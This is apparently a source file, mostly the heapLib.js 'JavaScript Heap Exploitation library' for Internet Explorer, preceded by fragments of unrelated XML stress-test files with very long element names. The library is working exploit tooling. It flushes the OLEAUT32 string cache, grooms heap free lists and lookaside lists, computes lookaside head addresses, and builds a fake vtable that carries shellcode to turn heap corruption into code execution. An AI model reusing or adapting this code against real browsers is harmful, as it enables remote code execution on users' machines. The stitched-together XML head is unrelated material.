ataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong>
        value1
</MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong>
</data>
</root>
</XML>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid4">
<Devices>
<Device>
<bb />
</Device>
</Devices>
</XML>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid5">
<Devices>
<Device>
<BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB />
</Device>
</Devices>
</XML>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid6">
<root>
<data>
<CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC>
        value2
</CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC>
</data>
</root>
</XML>

  </body>
</html>

heapLib.js:

/*
   JavaScript Heap Exploitation library
   by Alexander Sotirov <[email]asotirov@determina.com[/email]>
 
   Version 0.3


   To enable debugging output, set the following WinDbg breakpoints:

bc *
bu 7c9106eb "j (poi(esp+4)==0x150000) '.printf \"alloc(0x%x) = 0x%x\", poi(esp+c), eax; .echo; g'; 'g';"
bu ntdll!RtlFreeHeap "j ((poi(esp+4)==0x150000) & (poi(esp+c)!=0)) '.printf \"                          free(0x%x), size=0x%x\", poi(esp+c), wo(poi(esp+c)-8)*8-8; .echo; g'; 'g';"
bd 0 1
bu jscript!JsAtan2 "j (poi(poi(esp+14)+18) == babe) '.printf \"DEBUG: %mu\", poi(poi(poi(esp+14)+8)+8); .echo; g';"
bu jscript!JsAtan "j (poi(poi(esp+14)+8) == babe) '.echo DEBUG: Enabling heap breakpoints; be 0 1; g';"
bu jscript!JsAsin "j (poi(poi(esp+14)+8) == babe) '.echo DEBUG: Disabling heap breakpoints; bd 0 1; g';"
bu jscript!JsAcos "j (poi(poi(esp+14)+8) == babe) '.echo DEBUG: heapLib breakpoint'"
g

   To disable the OLEAUT32 cache, set oleaut32!g_fDebNoCache to 1

*/


//
// heapLib namespace
//

// Namespace holder: heapLib.ie and its prototype methods are attached to this
// function below. It has no body of its own.
function heapLib() {
}


//
// heapLib class
//

// heapLib.ie constructor
//
// Creates a new heapLib API object for Internet Explorer. The maxAlloc
// argument sets the maximum block size that can be allocated using the alloc()
// function.
//
// Arguments:
//    maxAlloc - maximum allocation size in bytes (defaults to 65535)
//    heapBase - base of the default process heap (defaults to 0x150000)
//

heapLib.ie = function(maxAlloc, heapBase) {

    // Falsy arguments (including 0) fall back to the defaults.
    this.maxAlloc = (maxAlloc ? maxAlloc : 65535);
    this.heapBase = (heapBase ? heapBase : 0x150000);

    // Allocate a padding string that uses maxAlloc bytes.
    // The string is doubled until its BSTR size (4 + length*2 + 2, the same
    // formula allocOleaut32() uses) is at least maxAlloc.
    this.paddingStr = "AAAA";

    while (4 + this.paddingStr.length*2 + 2 < this.maxAlloc) {
        this.paddingStr += this.paddingStr;
    }

    // Create an array for storing references to allocated memory; it is used
    // as a tag -> array-of-strings map by allocOleaut32()/freeOleaut32().
    this.mem = new Array();

    // Call flushOleaut32() once to allocate the maximum size blocks
    // (this also triggers CollectGarbage(), a JScript-only global).
    this.flushOleaut32();
}


//
// Outputs a debugging message in WinDbg. The msg argument must be a string
// literal. Using string concatenation to build the message will result in heap
// allocations.
//
// Arguments:
//    msg - string to output
//

heapLib.ie.prototype.debug = function(msg) {
    // 0xbabe is the marker matched by the jscript!JsAtan2 breakpoint in the
    // file header; without a debugger this call has no effect.
    void(Math.atan2(0xbabe, msg));
}


//
// Enables or disables logging of heap operations in WinDbg.
//
// Arguments:
//    enable - a boolean value, set to true to enable heap logging
//

heapLib.ie.prototype.debugHeap = function(enable) {
    // Math.atan / Math.asin with the 0xbabe marker are the hooks matched by
    // the jscript!JsAtan / jscript!JsAsin breakpoints in the file header
    // (enable / disable heap logging). Only `enable == true` selects atan;
    // any other value selects asin, exactly as before.
    var hook = (enable == true) ? Math.atan : Math.asin;
    hook(0xbabe);
}


//
// Triggers a breakpoint in the debugger.
//

// Note: the msg argument is accepted but not used.
heapLib.ie.prototype.debugBreak = function(msg) {
    // Matched by the jscript!JsAcos breakpoint in the file header.
    void(Math.acos(0xbabe));
}


//
// Returns a string of a specified length, up to the maximum allocation size
// set in the heapLib.ie constructor. The string contains "A" characters.
//
// Arguments:
//    len - length in characters
//

heapLib.ie.prototype.padding = function(len) {
    // paddingStr is sized in the constructor from maxAlloc; longer requests
    // are rejected rather than silently truncated.
    if (len > this.paddingStr.length)
        throw "Requested padding string length " + len + ", only " + this.paddingStr.length + " available";

    return this.paddingStr.substr(0, len);
}


//
// Returns a number rounded up to a specified value.
//
// Arguments:
//    num   - integer to round
//    round - value to round to
//

heapLib.ie.prototype.round = function(num, round) {
    // Round num up to the next multiple of round. parseInt() is kept as the
    // truncation step so results match the previous implementation exactly.
    if (round == 0)
        throw "Round argument cannot be 0";

    var bumped = num + (round-1);
    var quotient = parseInt(bumped / round);
    return quotient * round;
}


//
// Converts an integer to a hex string. This function uses the heap.
//
// Arguments:
//    num   - integer to convert
//    width - pad the output with zeros to a specified width (optional)
//

heapLib.ie.prototype.hex = function(num, width)
{
    var digits = "0123456789ABCDEF";

    // Lowest nibble first; higher nibbles are prepended below.
    var hex = digits.substr(num & 0xF, 1);

    // The loop is only entered for num > 0xF, so a negative num yields a
    // single digit (its low nibble).
    while (num > 0xF) {
        num = num >>> 4;
        hex = digits.substr(num & 0xF, 1) + hex;
    }

    // Re-declares the width parameter; harmless, treats a missing width as 0.
    var width = (width ? width : 0);

    while (hex.length < width)
        hex = "0" + hex;

    return hex;
}


//
// Convert a 32-bit address to a 4-byte string with the same representation in
// memory. This function uses the heap.
//
// Arguments:
//    addr - integer representation of the address
//

heapLib.ie.prototype.addr = function(addr) {
    // Low 16 bits first, then the high 16 bits, each as a 4-digit %u escape.
    return unescape("%u" + this.hex(addr & 0xFFFF, 4) + "%u" + this.hex((addr >> 16) & 0xFFFF, 4));
}


//
// Allocates a block of a specified size with the OLEAUT32 alloc function.
//
// Arguments:
//    arg - size of the new block in bytes, or a string to strdup
//    tag - a tag identifying the memory block (optional)
//

heapLib.ie.prototype.allocOleaut32 = function(arg, tag) {

    var size;

    // Calculate the allocation size
    if (typeof arg == "string" || arg instanceof String)
        size = 4 + arg.length*2 + 2;    // len + string data + null terminator
    else
        size = arg;

    // Make sure that the size is valid
    if ((size & 0xf) != 0)
        throw "Allocation size " + size + " must be a multiple of 16";

    // Create an array for this tag if one doesn't already exist. When tag is
    // omitted the blocks are kept under the property key "undefined".
    if (this.mem[tag] === undefined)
        this.mem[tag] = new Array();

    if (typeof arg == "string" || arg instanceof String) {
        // Allocate a new block with strdup of the string argument
        this.mem[tag].push(arg.substr(0, arg.length));
    }
    else {
        // Allocate the block: a padding string whose BSTR size is arg bytes
        // ((arg-6)/2 characters); padding() throws if that exceeds maxAlloc.
        this.mem[tag].push(this.padding((arg-6)/2));
    }
}


//
// Frees all memory blocks marked with a specific tag with the OLEAUT32 memory
// allocator.
//
// Arguments:
//    tag - a tag identifying the group of blocks to be freed
//

heapLib.ie.prototype.freeOleaut32 = function(tag) {

    // Drop every reference held under this tag (no error if the tag is unknown).
    delete this.mem[tag];

    // Run the garbage collector (CollectGarbage is a JScript-only global).
    CollectGarbage();
}


//
// The JScript interpreter uses the OLEAUT32 memory allocator for all string
// allocations. This allocator stores freed blocks in a cache and reuses them
// for later allocations. The cache consists of 4 bins, each storing up to 6
// blocks. Each bin holds blocks of a certain size range:
//
//    0 - 32
//    33 - 64
//    65 - 256
//    257 - 32768
//
// When a block is freed by the OLEAUT32 free function, it is stored in one of
// the bins. If the bin is full, the smallest block in the bin is freed with
// RtlFreeHeap() and is replaced with the new block. Chunks larger than 32768
// bytes are not cached and are freed directly.
//
// To flush the cache, we need to free 6 blocks of the maximum size for each
// bin. The maximum size blocks will push out all smaller blocks from the
// cache. Then we allocate the maximum size blocks again, leaving the cache
// empty.
//
// You need to call this function once to allocate the maximum size blocks
// before you can use it to flush the cache.
//

heapLib.ie.prototype.flushOleaut32 = function() {

    this.debug("Flushing the OLEAUT32 cache");

    // Free the maximum size blocks and push out all smaller blocks

    this.freeOleaut32("oleaut32");

    // Allocate the maximum sized blocks again, emptying the cache.
    // allocOleaut32() is used directly here because alloc() rejects exactly
    // these four sizes.

    for (var i = 0; i < 6; i++) {
        this.allocOleaut32(32, "oleaut32");
        this.allocOleaut32(64, "oleaut32");
        this.allocOleaut32(256, "oleaut32");
        this.allocOleaut32(32768, "oleaut32");
    }
}


//
// Allocates a block of a specified size with the system memory allocator. A
// call to this function is equivalent to a call to HeapAlloc(). If the first
// argument is a number, it specifies the size of the new block, which is
// filled with "A" characters. If the argument is a string, its data is copied
// into a new block of size arg.length * 2 + 6. In both cases the size of the
// new block must be a multiple of 16 and not equal to 32, 64, 256 or 32768.
//
// Arguments:
//    arg - size of the memory block in bytes, or a string to strdup
//    tag - a tag identifying the memory block (optional)
//

heapLib.ie.prototype.alloc = function(arg, tag) {

    var size;

    // Calculate the allocation size (same formula as allocOleaut32)
    if (typeof arg == "string" || arg instanceof String)
        size = 4 + arg.length*2 + 2;    // len + string data + null terminator
    else
        size = arg;

    // Make sure that the size is valid: these four sizes are the ones
    // flushOleaut32() keeps resident in the cache.
    if (size == 32 || size == 64 || size == 256 || size == 32768)
        throw "Allocation sizes " + size + " cannot be flushed out of the OLEAUT32 cache";

    // Allocate the block with the OLEAUT32 allocator (which also enforces the
    // multiple-of-16 rule).
    this.allocOleaut32(arg, tag);
}


//
// Frees all memory blocks marked with a specific tag with the system memory
// allocator. A call to this function is equivalent to a call to HeapFree().
//
// Arguments:
//    tag - a tag identifying the group of blocks to be freed
//

heapLib.ie.prototype.free = function(tag) {

    // Free the blocks with the OLEAUT32 free function (drops the references
    // and runs CollectGarbage())
    this.freeOleaut32(tag);

    // Flush the OLEAUT32 cache
    this.flushOleaut32();
}


//
// Runs the garbage collector and flushes the OLEAUT32 cache. Call this
// function before using alloc() and free().
//

heapLib.ie.prototype.gc = function() {

    this.debug("Running the garbage collector");
    // JScript-only global.
    CollectGarbage();

    this.flushOleaut32();
}


//
// Adds blocks of the specified size to the free list and makes sure they are
// not coalesced. The heap must be defragmented before calling this function.
// If the size of the memory blocks is less than 1024, you have to make sure
// that the lookaside is full.
//
// Arguments:
//    arg    - size of the new block in bytes, or a string to strdup
//    count  - how many free blocks to add to the list (defaults to 1)
//

heapLib.ie.prototype.freeList = function(arg, count) {

    // Re-declares the count parameter; a falsy count means 1.
    var count = (count ? count : 1);

    // Alternate untagged (kept) and "freeList"-tagged (freed below) blocks so
    // that the freed blocks are separated by live ones.
    for (var i = 0; i < count; i++) {
        this.alloc(arg);
        this.alloc(arg, "freeList");
    }
    this.alloc(arg);

    this.free("freeList");
}


//
// Add blocks of the specified size to the lookaside. The lookaside must be
// empty before calling this function.
//
// Arguments:
//    arg    - size of the new block in bytes, or a string to strdup
//    count  - how many blocks to add to the lookaside (defaults to 1)
//

heapLib.ie.prototype.lookaside = function(arg, count) {

    var size;

    // Calculate the allocation size (same formula as allocOleaut32)
    if (typeof arg == "string" || arg instanceof String)
        size = 4 + arg.length*2 + 2;    // len + string data + null terminator
    else
        size = arg;

    // Make sure that the size is valid
    if ((size & 0xf) != 0)
        throw "Allocation size " + size + " must be a multiple of 16";

    // Block plus 8-byte header must stay below 1024.
    if (size+8 >= 1024)
        throw("Maximum lookaside block size is 1008 bytes");

    // Re-declares the count parameter; a falsy count means 1.
    var count = (count ? count : 1);

    for (var i = 0; i < count; i++)
        this.alloc(arg, "lookaside");

    this.free("lookaside");
}


//
// Return the address of the head of the lookaside linked list for blocks of a
// specified size. Uses the heapBase parameter from the heapLib.ie constructor.
//
// Arguments:
//    arg - size of the new block in bytes, or a string to strdup
//

heapLib.ie.prototype.lookasideAddr = function(arg)
{
    // Size of the block arg describes: either a byte count, or the BSTR size
    // of a string (len + data + terminator, as in allocOleaut32).
    var isString = (typeof arg == "string" || arg instanceof String);
    var size = isString ? (4 + arg.length*2 + 2) : arg;

    // Same validity rules as lookaside().
    if ((size & 0xf) != 0)
        throw "Allocation size " + size + " must be a multiple of 16";

    if (size+8 >= 1024)
        throw("Maximum lookaside block size is 1008 bytes");

    // The lookaside array starts at heapBase + 0x688 and holds one 48-byte
    // entry per 8-byte size class (block size plus 8-byte header).
    var sizeClass = (size+8)/8;
    return this.heapBase + 0x688 + sizeClass*48;
}


//
// Returns a fake vtable that contains shellcode. The caller should free the
// vtable to the lookaside and use the address of the lookaside head as an
// object pointer. When the vtable is used, the address of the object must be
// in eax and the pointer to the vtable must be in ecx. Any virtual function
// call through the vtable from ecx+8 to ecx+0x80 will result in shellcode
// execution. This function uses the heap.
//
// Arguments:
//    shellcode - shellcode string
//    jmpecx    - address of a jmp ecx or equivalent instruction
//    size      - size of the vtable to generate (defaults to 1008 bytes)
//

heapLib.ie.prototype.vtable = function(shellcode, jmpecx, size) {

    // Re-declares the size parameter; a falsy size means 1008.
    var size = (size ? size : 1008);

    // Make sure the size is valid
    if ((size & 0xf) != 0)
        throw "Vtable size " + size + " must be a multiple of 16";

    // 138 bytes of the block are taken by the fixed prefix/suffix laid out below.
    if (shellcode.length*2 > size-138)
        throw("Maximum shellcode length is " + (size-138) + " bytes");

    // Build the fake vtable that will go on the lookaside list
    //
    // lookaside ptr  jmp +124  addr of jmp ecx  sub [eax], al*2  shellcode       null
    // 4 bytes        4 bytes   124 bytes        4 bytes          size-138 bytes  2 bytes

    var vtable = unescape("%u9090%u7ceb")   // nop, nop, jmp + 124

    // 124 bytes of 4-byte addresses, via this.addr()
    for (var i = 0; i < 124/4; i++)
        vtable += this.addr(jmpecx);

    // If the vtable is the only entry on the lookaside, the first 4 bytes will
    // be 00 00 00 00, which disassembles as two add [eax], al instructions.
    // The jmp ecx trampoline will jump back to the beginning of the vtable and
    // execute the add [eax], al instructions. We need to use two sub [eax], al
    // instructions to fix the heap.

    // NOTE(review): the padding call below goes through the global `heap`
    // rather than `this`, so this method only works when a global named `heap`
    // holds a heapLib.ie instance (the other methods use `this.padding`).
    vtable += unescape("%u0028%u0028") +    // two sub [eax], al instructions
              shellcode + heap.padding((size-138)/2 - shellcode.length);

    return vtable;
}